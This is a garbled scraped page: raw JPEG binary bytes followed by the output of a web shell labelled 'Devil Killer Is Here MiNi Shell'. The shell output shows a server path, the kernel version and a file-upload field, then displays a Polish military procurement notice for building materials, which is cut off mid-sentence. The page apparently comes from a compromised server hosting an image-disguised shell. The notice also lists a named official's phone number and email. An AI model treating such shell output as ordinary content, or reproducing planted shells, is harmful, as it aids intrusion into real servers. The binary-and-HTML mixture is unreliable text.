JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230310/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230310/0013025701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa materiałów ogólnobudowlanych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">32 Baza Lotnictwa Taktycznego w Łasku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 730097572</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">9 - go Maja 95</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łask</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">98-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL714 - Sieradzki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">32bltprz@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://32blt.wp.mil.pl/pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Skarb Państwa </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa materiałów ogólnobudowlanych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-6e547c2d-bf2c-11ed-b311-9aae6ad31be8</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00130257</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-03-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00121732/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa materiałów ogólnobudowlanych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/32blt/public/postepowanie?postepowanie=43269254 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W trakcie procedowania postępowania komunikacja między Zamawiającym a Wykonawcami, w szczególności składanie ofert, wymiana informacji oraz przekazywanie dokumentów i oświadczeń, odbywa się przy użyciu środków komunikacji elektronicznej zapewnionych przez Portal e-Usług SmartPZP.<br/>Po otwarciu ofert, komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są elektronicznie za pośrednictwem Systemu, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”.<br/>W sytuacji awarii Systemu Platformy SmartPzp, niedostępności Systemu lub trudności związanych z jego użytkowaniem, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na adres: 32bltprz@ron.mil.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Do pełnego i prawidłowego korzystania z Systemu przez Użytkowników Zewnętrznych konieczne jest posiadanie przez co najmniej jednego uprawnionego Użytkownika Zewnętrznego Wykonawcy kwalifikowanego podpisu elektronicznego lub podpisu zaufanego lub podpisu osobistego służącego do autentykacji i podpisu.<br/>Użycie przez Wykonawcę do kontaktu z Zamawiającym środków komunikacji elektronicznej zapewnionych w Systemie jest uzależnione od uprzedniej akceptacji przez Wykonawcę Regulaminu korzystania z usług Systemu na witrynie internetowej przy zakładaniu profilu Wykonawcy.<br/>Za pośrednictwem posiadanego w Systemie konta Użytkownika Zewnętrznego tj. użytkownika Wykonawcy odbywa się komunikacja Wykonawcy z Zamawiającym w postępowaniu, w szczególności: przekazywanie dokumentów, oświadczeń, informacji, pytań, wniosków w ramach postępowania.<br/>Zadawanie pytań przez Wykonawców odbywa się w zakładce „Pytania do postępowania”.<br/>Ofertę wraz z załącznikami należy złożyć za pośrednictwem zakładki „Oferty”.<br/>Po otwarciu ofert, komunikacja między Zamawiającym a Wykonawcami, w tym wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje, przekazywane są elektronicznie za pośrednictwem Systemu, w zakładce „Korespondencja”, która dla Wykonawcy jest widoczna w Zakładce „Oferty”, po zaznaczeniu numeru złożonej oferty.<br/>Poprzez Portal e-Usług SmartPZP, Zamawiający będzie przekazywał wezwania i zawiadomienia, informacje, odpowiedzi na pytania w ramach postępowania, itp. W trakcie procedowania postępowania Wykonawca jest zobowiązany do utrzymywania kontaktu z Zamawiającym w sprawie wyjaśnień w zakresie złożonej oferty. Co więcej, Wykonawca ma obowiązek śledzić powiadomienia w skrzynce odbiorczej swojego konta na Portalu SmartPZP.<br/>Instrukcje korzystania z platformy zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu Portalu e-Usług SmartPZP znajdują się w zakładce E-LEARNING, dostępnej pod adresem internetowym: https://portal.smartpzp.pl/elearning<br/>Korzystanie z Systemu możliwe jest, pod warunkiem spełnienia następujących minimalnych wymagań technicznych:<br/>1. Stały dostęp do sieci Internet o gwarantowanej przepustowości, nie mniejszej niż 1Mb/s.<br/>2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje.<br/>3. Przeglądarki internetowe: Mozzilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i późniejsze lub Opera ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11. Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox, Opera. Zalecane jest używanie najnowszych wersji przeglądarek<br/>4. Dodatkowe oprogramowanie: zainstalowane środowisko Java w wersji min. 1.8 (jre), w przypadku przeglądarek Opera, Chrome i Firefox należy doinstalować dodatek do przeglądarki Szafir SDK Web, oprogramowania SzafirHost w systemie operacyjnym.<br/><br/>Oferta składana jest pod rygorem nieważności w formie elektronicznej, tj. postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym (certyfikat zainstalowany w e-dowodzie) osoby upoważnionej do reprezentowania Wykonawcy. <br/>Sposób sporządzenia dokumentów elektronicznych lub ich cyfrowego odwzorowania musi być zgodny z wymaganiami określonymi w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz Rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">W związku z przetwarzaniem danych osobowych Zamawiający informuje, że:<br/>1. Administratorem danych osobowych jest: 32 Baza Lotnictwa Taktycznego w Łasku, 98-100 Łask, ul. 9-go Maja 95.<br/>2. Inspektorem ochrony danych osobowych w 32. Bazie Lotnictwa Taktycznego w Łasku jest Pan Paweł Rogala, tel. 261 554 639, email: p.rogala@ron.mil.pl.<br/>3. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu prowadzenia postępowania o udzielenie zamówienia publicznego nr ref. 22/TP1/2023.<br/>4. Odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz.U. z 2022 r. poz. 1710 ze zm.), dalej „ustawa Pzp”.<br/>5. Zgodnie z art. 78 ust. 1 ustawy Pzp, dane osobowe będą przechowywane przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6. Obowiązek podania danych osobowych Wykonawcy lub osób występujących w jego imieniu jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp.<br/>7. W odniesieniu do danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO.<br/>8. Wykonawcy przysługuje:<br/>−na podstawie art. 15 RODO prawo dostępu do danych osobowych;<br/>−na podstawie art. 16 RODO prawo do sprostowania danych osobowych;<br/>−na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>−prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy przetwarzanie danych osobowych narusza przepisy RODO.<br/>9. Wykonawcy nie przysługuje:<br/>−w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>−prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>−na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">22/TP1/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 171104,36 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa materiałów ogólnobudowlanych:<br/>Część 1 – Materiały ogólnobudowlane dla JW 1158 Łask;<br/>Zakres i rodzaj asortymentu, ilość, typ opakowań i inne istotne elementy dotyczące opisu przedmiotu zamówienia zostały określone w:<br/>- Formularzu cenowym dla części 1 i 2 zamówienia − załącznik nr 3a do SWZ;<br/>Przedmiotem zamówienia jest zakup nowych artykułów ogólnobudowlanych i malarskich w ilościach, opakowaniach i rodzaju wyszczególnionym w formularzu cenowym;<br/>Przedmiot zamówienia powinien być dostarczony w oryginalnych, jednostkowych opakowaniach producenta.<br/>Dostarczony przez Wykonawcę materiał musi być fabrycznie nowy.<br/>Wykonawca zapewnia Zamawiającemu wysoką jakość materiałów zgodnie z parametrami określonymi w dokumentach zamówienia.<br/>W przypadku, gdy dostarczony towar (w części lub całości) nie będzie odpowiadał opisowi określonemu w formularzu cenowym – Zamawiający odmówi przyjęcia towaru, a Wykonawca zobowiązany będzie do dostarczenia towaru zgodnego z przedmiotem zamówienia w terminie 14 dni od dnia odmowy przyjęcia, jednak nie później niż do końca czasu trwania umowy, na swój koszt.<br/>Materiały będące przedmiotem zamówienia jak i materiały równoważne objęte terminem przydatności do użycia, muszą posiadać co najmniej 3/4 terminu nominalnego licząc od dnia dostawy. Powyższe dotyczy formularza cenowego dla pozycji:<br/>1. część 1: 1, 11, 15-23, 26, 31, 46-48, 59-60, 64-70, 75, 82-84;<br/><br/>Produkty odbierane będą przez Zamawiającego w obecności upoważnionego przedstawiciela Wykonawcy. Produkty mają być przedstawione przez Wykonawcę do odbioru w sposób pozwalający na dokonanie ich oceny zgodności z Umową. W przypadku dostawy farb Zamawiający wraz z dostawą wymaga dostarczenia kart charakterystyki produktu lub innego równoważnego dokumentu zawierającego informacje w szczególności na temat sposobu transportu, przechowywania i stosowania produktu.<br/>Informacje w szczególności na temat rozliczenia, warunków dostawy i gwarancji zawiera wzór umowy - załącznik nr 4 do SWZ.<br/>PRODUKTY RÓWNOWAŻNE:<br/>1. Jeżeli w dokumentach dotyczących zamówienia wskazana jest marka, producent lub nazwa własna, należy traktować to jako produkt przykładowy. Wykonawca może zaoferować produkt równoważny w stosunku do wskazanego przez Zamawiającego. Produkty równoważne muszą posiadać parametry techniczne nie gorsze niż te wyszczególnione w formularzu cenowym - załączniku nr 3a do SWZ.<br/>2. Zastosowanie materiałów równoważnych nie może naruszać warunków gwarancji lub powodować jej utraty.<br/>3. Zamawiający dopuszcza oferowanie produktów równoważnych, ale ciężar udowodnienia równoważności spoczywa na Wykonawcy. W związku z tym, Wykonawca, który oferuje rozwiązania równoważne, musi w sposób niekwestionowany wykazać w ofercie, że spełniają one wymagania określone przez Zamawiającego (kryteria równoważności).<br/>4.Wykonawca oferując produkt równoważny w pozycjach, w których Zamawiający dopuścił zaoferowanie takich produktów tj. opatrzonych wpisem „lub równoważny” obowiązany jest podać w Formularzu cenowym – załącznik nr 3a do SWZ (w kolumnie „Równoważność”) dokładną nazwę i opis produktu równoważnego (wskazanie producenta, nazwy produktu itp.), na podstawie którego Zamawiający będzie mógł bezspornie zidentyfikować oferowany asortyment oraz zapoznać się z jego parametrami technicznymi. Brak jednoznacznego wskazania powyższych parametrów, uniemożliwiającego w sposób niebudzący wątpliwości identyfikację produktu zaoferowanego jako równoważny przez Wykonawcę na etapie składania ofert skutkować będzie odrzuceniem oferty jako niezgodnej z warunkami zamówienia.<br/>5. Brak wskazania przez Wykonawcę produktów równoważnych (tj. brak wypełnienia kolumny „Równoważność” w Formularzu cenowym – załącznik nr 3a do SWZ), jednoznacznie świadczy o tym, że Wykonawca nie oferuje produktów równoważnych, a wyłącznie te wskazane przez Zamawiającego. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 94957,89 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44111000-1 - Materiały budowlane</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Cena oferty uwzględniać powinna wszystkie zobowiązania związane z realizacją zamówienia (w ramach części, na którą składana jest oferta), musi być skalkulowania w walucie polskiego złotego (PLN) cyfrowo i słownie, z wyodrębnieniem wartości należnego podatku VAT.<br/>2. Cena podana w ofercie w ramach każdej części zamówienia powinna obejmować wszystkie koszty powstałe w wyniku realizacji zamówienia zgodnie z warunkami stawianymi przez Zamawiającego.<br/>3. Cena może być tylko jedna, nie dopuszcza się składania ofert wariantowych.<br/>4. Cena nie ulega zmianie przez okres ważności oferty (termin związania ofertą) oraz okres realizacji zamówienia z zastrzeżeniem możliwości zmiany umowy.<br/>5. Zamawiający wymaga wyceny każdej pozycji w formularzu cenowym w zakresie części, na którą Wykonawca składa ofertę.<br/>6. Cena netto to cena ustalona za jednostkę towaru, której ilość lub liczba jest wyrażona w jednostkach miar w rozumieniu przepisów o miarach (bez kwoty podatku VAT).<br/>7. Wartość netto to wartość towaru, którego dotyczy dostawa, bez kwoty podatku (iloczyn ceny jednostkowej netto i ilości towaru).<br/>8. Podatek VAT to kwota podatku od towarów i usług, obliczona według obowiązującej stawki procentowej.<br/>9. Wartość brutto zamówienia to całkowita wartość przedmiotu zamówienia wraz z kwotą podatku VAT (suma wartości netto i wartości podatku VAT) wg podanej ilości asortymentu w okresie realizacji umowy. Stanowi ona podstawę oceny ofert (w zakresie każdej z części zamówienia).<br/>10. Cenę za wykonanie przedmiotu zamówienia (tj. wartość brutto zamówienia dla danej części) należy skalkulować przy pomocy Formularza cenowego – załącznik odpowiednio nr 3a lub 3b do SWZ oraz przedstawić w Formularzu ofertowym ̶ załącznik nr 1 do SWZ.<br/>11. Formularz cenowy – załącznik nr 3a i 3b do SWZ udostępniany jest przez Zamawiającego w wersji edytowalnej (MS Excel). Wykonawca uzupełnia puste pola w następujący sposób:<br/>„Cena netto” – należy wpisać cenę jednostkową netto;<br/>Pozostałe wartości powinny zostać obliczone automatycznie, ale wskazane jest sprawdzenie i ewentualne skorygowanie poprawności przeprowadzonej kalkulacji ceny oferty.<br/>12. Podstawę oceny i porównania ofert stanowi cena brutto za wykonanie zamówienia, wpisana w formularzu ofertowym (załącznik nr 1 do SWZ) na podstawie ceny przedstawionej/wyliczonej w formularzu cenowym (załącznik nr 3a lub/i 3b do SWZ) w zakresie każdej z części zamówienia.<br/>13. Przy wyliczaniu poszczególnych wartości netto i brutto należy ograniczyć się do dwóch miejsc po przecinku na każdym etapie wyliczenia ceny. Kwoty wykazane w ofercie zaokrągla się do pełnych groszy, przy czym końcówki poniżej 0,5 grosza pomija się, a końcówki 0,5 grosza i wyższe zaokrągla się do 1 grosza.<br/>14. W przypadku rozbieżności cen w formularzu cenowym i ofertowym Zamawiający do oceny i porównania ofert przyjmie, że Wykonawca oferuje wykonanie zamówienia za cenę wpisaną/wyliczoną w formularzu cenowym.<br/>15. Za najkorzystniejszą zostanie uznana oferta, która uzyska największą sumę punktów w oparciu o ustalone kryterium cena 100%.<br/>Oferta z najniższą ceną otrzyma maksymalną liczbę punktów – 100. Pozostałe oferty zostaną przeliczone według wzoru w SWZ. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/>16. Oferta, która otrzyma najwięcej punktów w kryterium „cena oferty” zostanie uznana za najkorzystniejszą, a pozostałe oferty będą sklasyfikowane zgodnie z liczbą uzyskanych punktów. Realizacja zamówienia zostanie powierzona Wykonawcy, którego oferta uzyska najwyższą liczbę punktów.<br/>17. Jeżeli wybór najkorzystniejszej oferty będzie niemożliwy z uwagi na to, że zostały złożone oferty o takiej samej cenie Zamawiający wezwie Wykonawców do złożenia oferty dodatkowej.<br/>18. Brak określenia w ofercie ceny spowoduje odrzucenie oferty jako niezgodnej z treścią SWZ. Brak formularza cenowego, załączonego do oferty spowoduje odrzucenie oferty Wykonawcy.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest zakup i dostawa materiałów ogólnobudowlanych:<br/>Cześć 2 – Materiały ogólnobudowlane dla JW 1551 Sieradz;<br/>Zakres i rodzaj asortymentu, ilość, typ opakowań i inne istotne elementy dotyczące opisu przedmiotu zamówienia zostały określone w:<br/>- Formularzu cenowym dla części 1 i 2 zamówienia − załącznik nr 3a do SWZ;<br/>Przedmiotem zamówienia jest zakup nowych artykułów ogólnobudowlanych i malarskich w ilościach, opakowaniach i rodzaju wyszczególnionym w formularzu cenowym;<br/>Przedmiot zamówienia powinien być dostarczony w oryginalnych, jednostkowych opakowaniach producenta.<br/>Dostarczony przez Wykonawcę materiał musi być fabrycznie nowy.<br/>Wykonawca zapewnia Zamawiającemu wysoką jakość materiałów zgodnie z parametrami określonymi w dokumentach zamówienia.<br/>W przypadku, gdy dostarczony towar (w części lub całości) nie będzie odpowiadał opisowi określonemu w formularzu cenowym – Zamawiający odmówi przyjęcia towaru, a Wykonawca zobowiązany będzie do dostarczenia towaru zgodnego z przedmiotem zamówienia w terminie 14 dni od dnia odmowy przyjęcia, jednak nie 